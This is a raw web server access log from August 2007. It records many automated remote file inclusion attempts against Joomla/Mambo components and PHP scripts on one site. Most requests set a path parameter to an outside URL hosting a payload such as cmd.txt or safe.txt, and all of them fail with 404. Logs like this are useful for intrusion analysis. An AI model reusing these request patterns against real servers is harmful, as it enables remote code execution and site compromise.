193.9.123.60 - - [27/Aug/2007:13:53:14 -0700] "GET /logs/access_070716.log//index.php?_REQUEST=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.195.75.7 - - [27/Aug/2007:13:55:41 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:55:42 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:55:43 -0700] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:55:44 -0700] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.69.67.10 - - [27/Aug/2007:13:57:38 -0700] "GET /logs//index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.69.67.10 - - [27/Aug/2007:13:57:38 -0700] "GET //index.php?inc=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:58:37 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:13:58:37 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:01:46 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:01:47 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:04:03 -0700] "GET /logs/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:04:03 -0700] "GET /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:14:04:23 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:14:04:24 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:14:04:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:14:05:17 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:14:05:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.204.17.137 - - [27/Aug/2007:14:05:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.169.150 - - [27/Aug/2007:14:06:18 -0700] "GET /logs/access_070813.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.191.97.217 - - [27/Aug/2007:14:07:05 -0700] "GET /index.php?pagina=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:08:38 -0700] "GET /logs/access_070813.log/components/com_videodb/core/videodb.class.__xml.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:08:38 -0700] "GET /components/com_videodb/core/videodb.class.__xml.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:08:39 -0700] "GET /logs/components/com_videodb/core/videodb.class.__xml.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:08:39 -0700] "GET /logs/access.log/components/com_videodb/core/videodb.class.__xml.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.191.97.217 - - [27/Aug/2007:14:09:52 -0700] "GET /index.php?file=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.67.245.245 - - [27/Aug/2007:14:09:56 -0700] "GET /index.php?pagina=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.245 - - [27/Aug/2007:14:09:56 -0700] "GET /index.php?pagina=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.26.19 - - [27/Aug/2007:14:11:08 -0700] "GET /logs/access.log HTTP/1.0" 200 56033 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
122.153.62.163 - - [27/Aug/2007:14:12:09 -0700] "GET /logs/access_070618.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.153.62.163 - - [27/Aug/2007:14:12:09 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:12:32 -0700] "GET /logs/access_070806.log/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:12:36 -0700] "GET /logs/access_070813.log/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:12:55 -0700] "GET /logs/access_070806.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:13:06 -0700] "GET /logs/access_070806.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:13:10 -0700] "GET /logs/access.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:13:19 -0700] "GET /logs/access.log//components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.43.222.198 - - [27/Aug/2007:14:13:53 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:16:39 -0700] "GET /logs/access_070813.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.67.245.245 - - [27/Aug/2007:14:17:53 -0700] "GET /index.php?file=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.245.245 - - [27/Aug/2007:14:17:53 -0700] "GET /index.php?file=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:14:18:31 -0700] "GET /logs/access_070806.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.9.123.60 - - [27/Aug/2007:14:20:55 -0700] "GET /logs/access_070813.log//index.php?_REQUEST=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
193.9.123.60 - - [27/Aug/2007:14:20:55 -0700] "GET /logs/access.log//index.php?_REQUEST=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:14:22:28 -0700] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:14:22:35 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:14:22:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.28.49 - - [27/Aug/2007:14:24:59 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:29:30 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:14:35:16 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:14:35:16 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:14:38:26 -0700] "GET /logs/access_070813.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
219.239.89.26 - - [27/Aug/2007:14:45:05 -0700] "GET /index.php?pagina=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.239.89.26 - - [27/Aug/2007:14:48:21 -0700] "GET /index.php?file=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.25.232 - - [27/Aug/2007:14:49:32 -0700] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.232.248.226 - - [27/Aug/2007:14:49:43 -0700] "GET /logs/access_070716.log///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://cirrus.unbc.ca/anniversary/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.232.248.226 - - [27/Aug/2007:14:49:48 -0700] "GET ///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://cirrus.unbc.ca/anniversary/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.232.248.226 - - [27/Aug/2007:14:49:48 -0700] "GET /logs///modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://cirrus.unbc.ca/anniversary/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
218.38.19.40 - - [27/Aug/2007:14:50:32 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.19.40 - - [27/Aug/2007:14:50:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://wonst719.myi.cc/bbs/latest_skin/nzeo/survey/images/asc????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:14:52:21 -0700] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:14:52:21 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.97.20.22 - - [27/Aug/2007:14:52:22 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:54:26 -0700] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:54:26 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:55:08 -0700] "GET /logs/access_070806.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:55:08 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.195.75.7 - - [27/Aug/2007:14:55:09 -0700] "GET /logs/access_070813.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:55:12 -0700] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:55:13 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:55:14 -0700] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:14:55:14 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:55:15 -0700] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:55:15 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:55:19 -0700] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:14:55:20 -0700] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.24.101 - - [27/Aug/2007:14:57:54 -0700] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.59.7.10 - - [27/Aug/2007:15:01:25 -0700] "GET /logs/access_070716.log/modules/4nAlbum/public/displayCategory.php?basepath=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.40.96.10 - - [27/Aug/2007:15:02:33 -0700] "GET /logs/access_070806.log/index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.40.96.10 - - [27/Aug/2007:15:02:33 -0700] "GET /index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.40.96.10 - - [27/Aug/2007:15:02:34 -0700] "GET /logs/index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:03:48 -0700] "GET /logs/access_070806.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:03:48 -0700] "GET /logs/access_070806.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:03:49 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:03:49 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:03:49 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:03:49 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:10 -0700] "GET /logs/access_070806.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:10 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:10 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:14 -0700] "GET /logs/access.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:15 -0700] "GET /logs/access.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:26 -0700] "GET /logs/access.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:33 -0700] "GET /logs/access_070806.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:34 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:04:34 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.40.96.10 - - [27/Aug/2007:15:04:49 -0700] "GET /logs/access_070716.log/index1.php?dat=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:55 -0700] "GET /logs/access_070806.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:55 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:55 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:04:58 -0700] "GET /logs/access.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:05:13 -0700] "GET /logs/access.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:06:37 -0700] "GET /logs/access_070813.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:06:37 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:06:38 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:07:08 -0700] "GET /logs/access_070813.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:07:09 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [27/Aug/2007:15:07:09 -0700] "GET /logs/access_070813.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:07:09 -0700] "GET /logs/access_070813.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:07:09 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:07:09 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:07:09 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:07:09 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.7uh.com/gallery2/help? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:07:09 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:08:57 -0700] "GET /logs/access_070813.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:08:57 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [27/Aug/2007:15:08:58 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://bubblefishhosting.nl/images/asu? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.195.75.7 - - [27/Aug/2007:15:09:54 -0700] "GET /logs/access_070813.log/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.freewebtown.com/liviupustiu/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.110.144.106 - - [27/Aug/2007:15:10:04 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.teleparts.de/faq/inc/control.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
212.59.7.10 - - [27/Aug/2007:15:11:21 -0700] "GET /logs/access_070716.log/www.speedycars.cz/modules/4nAlbum/public/displayCategory.php?basepath=http://148.245.107.2/.ssh/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
